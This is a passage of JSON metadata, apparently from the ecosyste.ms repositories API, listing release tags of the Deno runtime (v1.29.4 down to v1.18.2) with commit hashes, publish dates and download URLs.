ag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.e